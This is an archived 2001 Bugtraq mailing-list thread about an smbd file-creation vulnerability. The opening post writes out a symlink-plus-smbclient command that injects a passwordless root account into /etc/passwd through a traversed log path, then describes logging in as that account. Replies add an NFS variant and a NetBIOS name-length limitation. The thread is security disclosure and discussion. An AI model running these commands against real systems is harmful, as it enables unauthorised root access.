6697226 2001-07-02 11:15 -0400 /40 rader/ Christopher William Palow <cwp@andrew.cmu.edu>
Sänt av: joel@lysator.liu.se
Importerad: 2001-07-02 23:26 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17754>
Ärende: Re: smbd remote file creation vulnerability
------------------------------------------------------------
From: Christopher William Palow <cwp@andrew.cmu.edu>
To: bugtraq@securityfocus.com
Message-ID: <Pine.LNX.4.21L-021.0107021108330.1654-100000@unix45.andrew.cmu.edu>
I was hoping to test this out but haven't been able to so here goes on
theoretical...
How to make this exploit a remote one using AFS or other remote file
systems.
What does this exploit need on the remote side?? A symlink;
soo... on a AFS system ,preferably one of a well known node that most
AFS servers would have in their CellServDB such as andrew.cmu.edu or
athena.mit.edu, create a symlink to /etc/passwd named x.log like
ln -s /etc/passwd /afs/andrew.cmu.edu/usr/<username>/x.log
now make the symlink world readable... then all you need is UNIXes
running samba in the vulnerable configuration and running AFS.
smbclient //afs.machine/"`perl -e '{print "\ntoor::0:0::/:/bin/sh\n"}'`" \
-n ../../../afs/andrew.cmu.edu/usr/<username>/x -N
telnet afs.machine
login as toor
if root logins aren't allowed make a dummy account first, login with
that then make a toor account ontop of that and su over to toor.
what machines does this really effect? Those running samba and AFS,
mainly educational institutions or other large institutions.
Christopher Palow
palow@cmu.edu
Senior Electrical and Computer Engineering
Carnegie Mellon University
(6697226) /Christopher William Palow <cwp@andrew.cmu.edu>/(Ombruten)
Kommentar i text 6701572 av Dan Stromberg <strombrg@nis.acs.uci.edu>
Kommentar i text 6701646 av Daniel Jacobowitz <dmj+@andrew.cmu.edu>
6701572 2001-07-02 14:28 -0700 /13 rader/ Dan Stromberg <strombrg@nis.acs.uci.edu>
Sänt av: joel@lysator.liu.se
Importerad: 2001-07-03 19:09 av Brevbäraren
Extern mottagare: Christopher William Palow <cwp@andrew.cmu.edu>
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17763>
Kommentar till text 6697226 av Christopher William Palow <cwp@andrew.cmu.edu>
Ärende: Re: smbd remote file creation vulnerability
------------------------------------------------------------
On Mon, Jul 02, 2001 at 11:15:29AM -0400, Christopher William Palow wrote:
> what machines does this really effect? Those running samba and AFS,
> mainly educational institutions or other large institutions.
...or systems with NFS configured with /net. Probably easier to find,
and wouldn't require creation on a machine the attacked system trusts
- any old NFS server on the internet should do then if /net is
configured.
--
Dan Stromberg UCI/NACS/DCS
(6701572) /Dan Stromberg <strombrg@nis.acs.uci.edu>/
Bilaga (application/pgp-signature) i text 6701573
6701573 2001-07-02 14:28 -0700 /10 rader/ Dan Stromberg <strombrg@nis.acs.uci.edu>
Importerad: 2001-07-03 19:09 av Brevbäraren
Extern mottagare: Christopher William Palow <cwp@andrew.cmu.edu>
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17764>
Bilaga (text/plain) till text 6701572
Ärende: Bilaga till: Re: smbd remote file creation vulnerability
------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iD8DBQE7QOdjo0feVm00f/8RAlSLAJ0UQp/QZze1AMhBnC+1J5z87uK2XACfZIdq
Inb0zArw//D7r3J45cCqLqo=
=Tcjc
-----END PGP SIGNATURE-----
(6701573) /Dan Stromberg <strombrg@nis.acs.uci.edu>/
6701646 2001-07-02 14:30 -0700 /40 rader/ Daniel Jacobowitz <dmj+@andrew.cmu.edu>
Sänt av: joel@lysator.liu.se
Importerad: 2001-07-03 19:23 av Brevbäraren
Extern mottagare: Christopher William Palow <cwp@andrew.cmu.edu>
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17765>
Kommentar till text 6697226 av Christopher William Palow <cwp@andrew.cmu.edu>
Ärende: Re: smbd remote file creation vulnerability
------------------------------------------------------------
From: Daniel Jacobowitz <dmj+@andrew.cmu.edu>
To: Christopher William Palow <cwp@andrew.cmu.edu>
Cc: bugtraq@securityfocus.com
Message-ID: <20010702143041.A798@nevyn.them.org>
On Mon, Jul 02, 2001 at 11:15:29AM -0400, Christopher William Palow wrote:
> I was hoping to test this out but haven't been able to so here goes on
> theoretical...
>
> How to make this exploit a remote one using AFS or other remote file
> systems.
>
> What does this exploit need on the remote side?? A
> symlink; soo... on a AFS system ,preferably one of a well known node that
> most AFS servers would have in their CellServDB such as
> andrew.cmu.edu or athena.mit.edu, create a symlink to /etc/passwd named
> x.log like
>
> ln -s /etc/passwd /afs/andrew.cmu.edu/usr/<username>/x.log
>
> now make the symlink world readable... then all you need is UNIXes running
> samba in the vulnerable configuration and running AFS.
>
> smbclient //afs.machine/"`perl -e '{print "\ntoor::0:0::/:/bin/sh\n"}'`" \
> -n ../../../afs/andrew.cmu.edu/usr/<username>/x -N
> telnet afs.machine
> login as toor
>
> if root logins aren't allowed make a dummy account first, login with that
> then make a toor account ontop of that and su over to toor.
Remember, the log path must be within 15 characters to fit in a
netbios name! You're not going to get anywhere on andrew, or most
other AFS paths, with that restriction.
--
Daniel Jacobowitz Carnegie Mellon University
MontaVista Software Debian GNU/Linux Developer
(6701646) /Daniel Jacobowitz <dmj+@andrew.cmu.edu>/(Ombruten)